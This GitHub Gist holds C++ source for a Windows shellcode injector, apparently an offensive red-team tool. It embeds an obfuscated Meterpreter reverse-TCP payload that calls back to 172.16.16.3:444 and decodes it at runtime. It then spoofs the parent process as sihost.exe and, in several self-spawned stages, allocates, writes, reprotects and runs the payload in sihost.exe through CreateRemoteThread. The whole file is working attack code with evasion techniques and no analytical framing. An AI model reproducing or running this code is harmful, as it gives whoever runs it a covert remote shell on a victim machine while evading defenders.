Created
April 6, 2021 08:28
-
-
Save uf0o/a0d90f5a7b9d22f8a102827a769e93ab to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <tlhelp32.h> | |
#include <stdio.h> | |
#include <string.h> | |
#include <iostream> | |
#include <stdarg.h> | |
void _dbg_printf(const char *fmt, ...) | |
{ | |
char msg[2048] = {}; | |
va_list args; | |
va_start(args, fmt); | |
_vsprintf_l(msg, fmt, NULL, args); | |
#ifdef _CONSOLE | |
printf(msg); | |
printf("\n"); | |
#else | |
OutputDebugStringA(msg); | |
#endif | |
va_end(args); | |
} | |
#ifdef _DEBUG | |
#define PRINTF(fmt, ...) _dbg_printf(fmt, __VA_ARGS__) | |
#else | |
#define PRINTF(...) | |
#endif | |
// setting global vars in BSS | |
#pragma bss_seg("shared") | |
int buffer; | |
PVOID sharedRemoteBuffer; | |
HANDLE remoteProcessHandle; | |
HANDLE remoteProcessHandleDup; | |
#pragma bss_seg() | |
#pragma comment(linker, "/section:shared,RWS") | |
bool bAttachToConsole() | |
{ | |
if (!AttachConsole(ATTACH_PARENT_PROCESS)) | |
{ | |
if (GetLastError() != ERROR_ACCESS_DENIED) //already has a console | |
{ | |
if (!AttachConsole(GetCurrentProcessId())) | |
{ | |
DWORD dwLastError = GetLastError(); | |
if (dwLastError != ERROR_ACCESS_DENIED) //already has a console | |
{ | |
return false; | |
} | |
} | |
} | |
} | |
return true; | |
} | |
static void* DecodeShellcode(__out SIZE_T *size) | |
{ | |
//encoded shellcode here / windows/meterpreter/reverse_tcp lport 444 lhost 172.16.16.3 | |
unsigned char shellcode[] = "\x84\x27\x56\xd9\x84\xd6\xe8\x79\x29\x87\x4e\x3e\xae\x92\x6c\xd6\xce\x43\x33\xd7\xcf\x43\xeb\x21\xd7\x89\xae\xd6\x1e\x2a\x57\xff\xd6\x8f\x47\xfe\x56\x8e\x55\xff\xd6\x00\x86\x16\xd9\x77\xa4\x59\x56\x4f\x84\x51\x81\xe6\x20\xf7\xd2\x20\xb3\x0b\x6c\x79\x29\xaf\x64\x16\xa4\xd8\x46\x70\x0f\xdd\x84\x92\xa7\xe3\x26\x75\x20\xf6\x04\x3d\xa7\xe3\x26\x7d\x20\x66\xb8\x77\xe7\x3b\x4a\x40\x20\xf6\x00\x34\xa7\xb4\x74\xec\xae\xab\xc1\x7e\x2b\x96\x44\x41\x10\x26\x66\x1e\x96\xce\xd1\x33\x01\xad\x47\x4f\xe4\x96\x1d\x31\xae\x8e\x6e\x24\x62\xa2\x63\x7a\x48\xc7\xaf\x8e\xe0\x92\x6c\x79\x58\x97\x5f\x3e\xae\x92\x65\xc9\x31\x09\xa2\x37\x8e\x88\x1d\x70\x2a\x0f\x3f\x36\xaa\x98\x45\x59\x33\xfb\x84\x37\x51\xab\xc5\x5f\x10\xaf\x3f\xb8\xbf\x9b\x4c\xa3\x20\xa1\x56\xab\x86\xaa\x55\xd8\x01\xa7\x76\x39\xb2\x3c\x52\xf0\x49\x0e\xca\x3f\x06\xb5\x56\xd7\x32\x8c\xc6\x4f\xa6\x16\x45\x59\x33\x4b\x66\x4f\x2f\x9b\xe4\x08\x21\x04\x67\x1e\xb4\xba\x1d\xf9\x38\x8e\x6e\x24\x86\x99\x44\x72\xe2\xac\x05\x16\xa5\xba\x47\x51\x62\x8e\x3e\xa3\xaa\xba\x26\x86\x35\x8c\x66\x15\xe5\x9b\x1d\x3b\x14\xee\xb1\xc1\x51\x39\x65\x5f\x52\xed\x67\xe9\x40\xbf\xa1\x74\xa7\x09\x40\x3e\x86\x58\x65\x48\x15\xae\xb6\x66\x27\x7c\xa8\x99\xd6\x3d\x24\x17\x79\xfe\x22\x56\x27\x09\x28\x78\xae\xba\xa6\x70\x18\xbb\x67\xc6\xf6\x1b\x82\xbd\xc9\x78\xf4\x54\xc4\x9b\x5d\x45\x43\xcc\xe7\x18\xb6\x3b\x4a\x40\x43\xed\x67\x69\x2e\x71\xdf\x0e\x29\x87\x4e\x3e\x51\x28\x45\x48\xb1\x9a\x8c\x3e\xae\x92\x00\x79\x6f\x87\x8b\x3e\x00\x92\xa0\x79\x2f\x87\x8b\x3e\x43\x92\x22\x79\xc5\x87\x4e\x3e\xe5\x9b\x5d\x41\x00\x7f\x56\x49\x8e\x92\x6c\xd0\x0f\xbe\x67\x69\x66\xe1\xaf\x21\x29\x87\x4e\x3e\x51\x28\x71\xe6\x29\x87\x4e\x33\xae\x1c\x6c\xf7\x29\x89\x4e\x50\xae\xd5\x6c\x9c\x29\x62\x4e\x52\xae\xd4\x6c\xbc\x29\x29\x4e\xf2\xae\x94\x6c\xbc\x29\x6a\x4e\x70\xae\x7e\x6c\x9c\x29\x6f\x4e\x56\xae\xfa\x6c\x91\x29\x81\x4e\x56\xae\xdb\x6c\x15\x29\x80\x4e\xd7\xae\x5a\x6c\x91\x29\xef\x4e\x96\xae\xfe\x6c\x10\x29\xce\x4e\x93\xae\x1c\x6c\xb5\x29\xc9\x4e\xd0\xae\xde\x6c\x70\x29\xad\x4e\x11\xae\x34\x6c\x13\x29\xe1\x4e\x14\xae\x14\x6c\x7f\x29\xaa\x4e\xd6\xae\x95\x6c\x53\x29\xcc\x4e\x96\xae\xb8\x6c\x15\x29\xa0\x4e\x11\xae\xdc\x6c\x93\x29\xac\x4e\xd7\xae\x1b\x6c\x7f\x29\x61\x4e\x72\xae\x9d\x6c\xb7\x29\xcd\x4e\xf6\xae\x37\x6c\x74\x29\xea\x4e\xd6\xae\x99\x6c\xb7\x29\x8c\x4e\x50\xae\x98\x6c\x7e\x29\x2f\x4e\x93\xae\x3a\x6c\xb4\x29\x0f\x4e\x18\xae\xd9\x6c\x76\x29\x69\x4e\xf0\xae\xfa\x6c\x92\x29\x29\x4e\x34\xae\xda\x6c\x7e\x29\xe9\x4e\x10\xae\x5a\x6c\xff\x29\x61\x4e\x38\xae\xbe\x6c\x52\x29\x6c\x4e\x30\xae\xb8\x6c\xbf\x29\xc1\x4e\xb8\xae\xb9\x6c\x91\x29\xef\x4e\x10\xae\xfc\x6c\xbf\x29\x0e\x4e\x71\xae\xbf\x6c\x72\x29\x0f\x4e\x14\xae\x92\x6c\x70\x18\xbf\x24\x75\x86\x99\xc5\x48\x91\xae\x3e\x26\x2a\x3b\x4a\x40\x43\x8e\xb6\x26\xae\xb2\x7c\x79\x23\xed\x24\x17\x56\xca\x7f\x7b\x5f\xec\xb1\x84\xa7\xa3\xb4\x70\x59\x9a\x4a\x37\x9f\x6e\x65\x48\x16\xae\xb6\x66\x8a\x66\x0d\x75\xd6\x3d\xfe\x26\x4f\x02\xc1\x79\x29\x87\x47\x4f\x46\x93\xdc\x61\xa7\xc0\x47\x0f\x95\x9b\x93\x41\x20\xbf\x72\x3a\x84\xf8\x66\x70\x3e\xe7\x4e\x3e\xae\xf2\x6c\x79\x29\x8d\x67\x0f\xb2\x9b\x1c\xe4\x2d\x8e\x7f\xc2\x87\xa3\x53\xf0\x18\xbb\xc7\x0f\xf3\xbb\x94\x21\x72\x3c\x13\x17\x51\x28\xdc\x61\xa7\x22\x33\x7c\xa7\xe3\x84\x7b\x99\x9f\xc0\x5a\xa7\xe2\x94\x78\x64\xe7\x45\x37\x9f\x72\x45\x48\x36\xca\x4d\x16\x85\x9b\x5d\x47\x64\x43\x05\x17\xf9\xe8\x67\xca\xf0\x87\x4e\x3e\xae\x6d\xd6\x34\x68\x6c\x47\x0f\x90\xdf\x8f\x32\x63\x8a\x4e\x58\xae\x92\x45\x48\x35\xca\xce\x16\x85\xbb\x3b\x03\x22\x34\x97\x3e\xae\x92\x6c\x86\x93\x2e\x68\x26\xc4\xd9\x65\x48\x17\x2e\x68\x07\xc4\xf8\x06\x13\x00\xd0\xfc\x35\xd9\xa0\x6c\x79\x29\x87\xb1\x84\x1e\x8a\xc2\xf8\x20\x78\xb7\xb0\xee\xef\x1b\x64\xf2\x87\x4e\x3e\xa7\xa3\x52\x13\x62\xae\xb6\x66\x0e\x83\xdf\x77\xd6\x3d\xfe\x26\x20\xaf\x65\x48\x17\xca\x87\x75\x87\xa3\x70\xd0\x18\x5f\x24\x73\xaf\xbb\x5d\x45\x00\x7f\x16\x31\x2e\x77\x88\x86\x93\x37\x56\xb0\xf7\xbb\x1d\xb8\x64\x84\x67\x0f\x92\xbb\x5d\x85\x00\xe2\x6a\x17\x9f\x8e\xc5\x48\xf1\xca\x2e\x75\x87\xc5\xc9\xb4\x1c\xff\x4e\x3e\xae\x92\x93\xc3\x99\x9f\xaf\xae\x5d\x6d\x93\x86\x34\x05\x4e\x3e\xae\x3c\x60\x35\xa9\xdd\x80\x45\x6f\xd5\x07\x93\x89\xaf\x51\x46\x7c\x8f\x60\x38\x65\x8c\x47\xec\x27\xa3\x92\x50\x58\x66\x30\xea\x4f\x22\xc2\x86\xd6\x78\x47\xec\xc4\xb9\x21\x71\x62\xae\x7f\x04\x96\xce\x6e\x50\xd1\x9f\x4e\x3c\xae\x92\x45\x2e\x22\x13\x24\x82\xae\x92\x6c\x79\xd6\x3d\x47\x4c\xc4\xf8\x65\x48\xd5\x8e\x7f\x00\xa7\xa3\x37\x50\xd1\x9f\x4e\x3a\xae\x92\x45\x48\x16\xae\xb6\x66\x23\xb7\xe8\xb6\xd6\x3d\x47\x4e\x36\x96\xdc\x61\xc8\x17\x6b\xc1\x51\x6d\xa0\x08\xc9\x8e\x6e\x46\x1e\x8a\xc2\x43\x22\xff\x45\x73\xae\xb9\x1b\x65\x8a\xc2\x0f\x16\x9f\xc9\x93\xc3\x41\x55\xa7\x76\x62\xe4\x25"; | |
void *r = malloc(sizeof(shellcode)); | |
char *ptr = (char *) r; | |
for(int i = 0; i < sizeof(shellcode); i++) { | |
ptr[i] = ~((shellcode[i] << 3) | (shellcode[i] >> (8 - 3))); //ror | |
} | |
//printf("Length: %d\n", sizeof(shellcode)); | |
//for (int i = 0; i < sizeof shellcode-1; i++) { | |
// printf("\\x%02x", shellcode[i]); | |
//} | |
*size = sizeof(shellcode); | |
return r; | |
} | |
bool CreateProcessWithParent(DWORD parentId, PWCHAR arg) { | |
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, parentId); | |
if (!hProcess) | |
return false; | |
SIZE_T size; | |
::InitializeProcThreadAttributeList(nullptr, 1, 0, &size); | |
auto buffer = std::make_unique<BYTE[]>(size); | |
auto attributes = reinterpret_cast<PPROC_THREAD_ATTRIBUTE_LIST>(buffer.get()); | |
::InitializeProcThreadAttributeList(attributes, 1, 0, &size); | |
::UpdateProcThreadAttribute(attributes, 0, | |
PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, | |
&hProcess, sizeof(hProcess), nullptr, nullptr); | |
STARTUPINFOEX si = { sizeof(si) }; | |
si.lpAttributeList = attributes; | |
PROCESS_INFORMATION pi; | |
PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle); | |
::SetHandleInformation(remoteProcessHandle, HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT); | |
WCHAR AppName[] = L".\\RemoteThreadInject.exe"; | |
WCHAR cmdline[100]; | |
WCHAR base[] = L".\\RemoteThreadInject.exe %ws"; | |
swprintf_s(cmdline, base, arg); | |
BOOL created = ::CreateProcess(AppName, cmdline, 0, 0, TRUE, EXTENDED_STARTUPINFO_PRESENT | CREATE_SUSPENDED, 0, 0, (STARTUPINFO*)&si, &pi); | |
HANDLE localProc = OpenProcess(PROCESS_ALL_ACCESS, TRUE, pi.dwProcessId); | |
DuplicateHandle(GetCurrentProcess(),remoteProcessHandle,localProc,&remoteProcessHandleDup,0,TRUE,DUPLICATE_SAME_ACCESS); | |
DuplicateHandle(localProc, remoteProcessHandleDup, localProc, &remoteProcessHandle, 0, TRUE, DUPLICATE_SAME_ACCESS); | |
ResumeThread(pi.hThread); | |
PRINTF("%ws - %ws", AppName, cmdline); | |
::CloseHandle(hProcess); | |
::DeleteProcThreadAttributeList(attributes); | |
return created; | |
} | |
DWORD FindProcByName(LPCWSTR lpProcessName) | |
{ | |
HANDLE hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); | |
if (hSnapshot == INVALID_HANDLE_VALUE) { | |
PRINTF("Failed to create snapshot. LastError %d", GetLastError()); | |
return 0; | |
} | |
PROCESSENTRY32 pe; | |
pe.dwSize = sizeof(pe); | |
if (!::Process32First(hSnapshot, &pe)) { | |
PRINTF("Failed to create snapshot. LastError %d", GetLastError()); | |
return 0; | |
} | |
DWORD dwPid = 0; | |
do { | |
if (_wcsicmp(lpProcessName, pe.szExeFile) == 0) { | |
dwPid = pe.th32ProcessID; | |
PRINTF("[*] Target PID = %d", dwPid); | |
} | |
} while(::Process32Next(hSnapshot, &pe) && dwPid == 0); | |
CloseHandle(hSnapshot); | |
return dwPid; | |
} | |
const char *args[] = { | |
"", | |
"VA", | |
"WPA", | |
"VP", | |
"CRT" | |
}; | |
int parseArgs1(const wchar_t *arg) | |
{ | |
if (arg == NULL) | |
return 0; | |
if (wcscmp(arg, L"VA") == 0) | |
return 1; | |
if (wcscmp(arg, L"WPM") == 0) | |
return 2; | |
if (wcscmp(arg, L"VP") == 0) | |
return 3; | |
if (wcscmp(arg, L"CRT") == 0) | |
return 4; | |
return 0; | |
} | |
int wmain(int argc, wchar_t *argv[]) | |
{ | |
PRINTF("[*] ...Running Main\n"); | |
STARTUPINFOA si; | |
si = {}; | |
PROCESS_INFORMATION child = {}; | |
int targetPid; | |
DWORD fakePPIDPid = 0; | |
DWORD returnLength = 0; | |
WCHAR fakePPID[] = L"sihost.exe"; | |
WCHAR target[] = L"sihost.exe"; | |
BOOL result = TRUE; | |
int c = 0; | |
if (argc > 1) | |
c = parseArgs1(argv[1]); | |
SIZE_T size = 0; | |
void* shellcode = DecodeShellcode(&size); | |
SIZE_T mem_size = ((size % 4096) == 0) ? size : (size / 4096) + 4096; | |
DWORD old = 0; | |
char targetImage[MAX_PATH] = {}; | |
const char* base = ".\\RemoteThreadInject.exe %s"; | |
const char* prefix = "null"; | |
fakePPIDPid = FindProcByName(fakePPID); | |
HANDLE remoteThread = NULL; | |
switch(c) { | |
case 0:{ | |
PRINTF("[*] Step 0 - Process PID is: %d\n", GetCurrentProcessId()); | |
targetPid = FindProcByName(target); | |
PRINTF("%d target image\n", targetPid); | |
remoteProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, TRUE, targetPid); | |
PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle); | |
if (remoteProcessHandle == NULL) { | |
PRINTF("Cannot open processs. LastError %d\n", GetLastError()); | |
return 1; | |
} | |
WCHAR prefix_new[] = L"VA"; | |
PRINTF("%s target image\n", targetImage); | |
CreateProcessWithParent(fakePPIDPid, prefix_new); | |
ExitProcess(0); | |
break; | |
} | |
case 1: { | |
PRINTF("[*] Step 1 - Current PID is: %d\n", GetCurrentProcessId()); | |
PRINTF("\t[*] Executing Virtual Alloc"); | |
PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle); | |
sharedRemoteBuffer = VirtualAllocEx(remoteProcessHandle, NULL, mem_size, (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE); | |
PRINTF("\t[*] shared buffer at: 0x%x\n", sharedRemoteBuffer); | |
if (sharedRemoteBuffer == NULL) { | |
PRINTF("Cannot allocate memory on remote process. LastError %d", GetLastError()); | |
return 1; | |
} | |
WCHAR prefix_new[] = L"WPM"; | |
CreateProcessWithParent(fakePPIDPid, prefix_new); | |
ExitProcess(0); | |
break; } | |
case 2: { | |
PRINTF("[*] Step 2 - Current PID is: %d", GetCurrentProcessId()); | |
PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle); | |
PRINTF("\t[*] Executing Write Process Memory"); | |
if (WriteProcessMemory(remoteProcessHandle, sharedRemoteBuffer, shellcode, size, NULL) == FALSE) { | |
PRINTF("Error using WriteProcessMemory. LastError %d", GetLastError()); | |
return 1; | |
} | |
memset(shellcode, 0, size); | |
free(shellcode); | |
WCHAR prefix_new[] = L"VP"; | |
CreateProcessWithParent(fakePPIDPid, prefix_new); | |
ExitProcess(0); | |
break; } | |
case 3: { | |
PRINTF("[*] Step 3 - Current PID is: %d", GetCurrentProcessId()); | |
PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle); | |
PRINTF("\t[*] Executing Virtual Protect"); | |
if (VirtualProtectEx(remoteProcessHandle, sharedRemoteBuffer, mem_size, PAGE_EXECUTE_READWRITE, &old) == FALSE) { | |
PRINTF("Error on VirtualProtectEx. LastError %d", GetLastError()); | |
return 1; | |
} | |
WCHAR prefix_new[] = L"CRT"; | |
CreateProcessWithParent(fakePPIDPid, prefix_new); | |
ExitProcess(0); } | |
case 4: { | |
PRINTF("[*] Step 4 - Current PID is: %d", GetCurrentProcessId()); | |
PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandleDup); | |
PRINTF("\t[*] Executing Create Remote Thread"); | |
remoteThread = CreateRemoteThread(remoteProcessHandleDup, NULL, 0, (LPTHREAD_START_ROUTINE)sharedRemoteBuffer, NULL, 0, NULL); | |
if (remoteThread == NULL) { | |
PRINTF("Cannot Create Thread on remote process. LastError %d", GetLastError()); | |
return 1; | |
} | |
WaitForSingleObject(remoteThread, INFINITE); | |
PRINTF("[*] - Exiting"); | |
ExitProcess(0); | |
break; } | |
} | |
ResumeThread(child.hThread); | |
WaitForSingleObject(child.hProcess, INFINITE); | |
CloseHandle(child.hThread); | |
CloseHandle(child.hProcess); | |
remoteProcessHandle = NULL; | |
if (remoteProcessHandle != NULL) { | |
CloseHandle(remoteProcessHandle); | |
} | |
return 0; | |
} | |
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) | |
{ | |
LPWSTR* szArglist; | |
int nArgs; | |
int i; | |
PRINTF("[*] ...Running WinMain\n"); | |
szArglist = CommandLineToArgvW(GetCommandLineW(), &nArgs); | |
if (NULL == szArglist) | |
{ | |
PRINTF("CommandLineToArgvW failed\n"); | |
return 0; | |
} | |
else for (i = 0; i < nArgs; i++) PRINTF("%d: %ws", i, szArglist[i]); | |
wmain(nArgs, szArglist); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment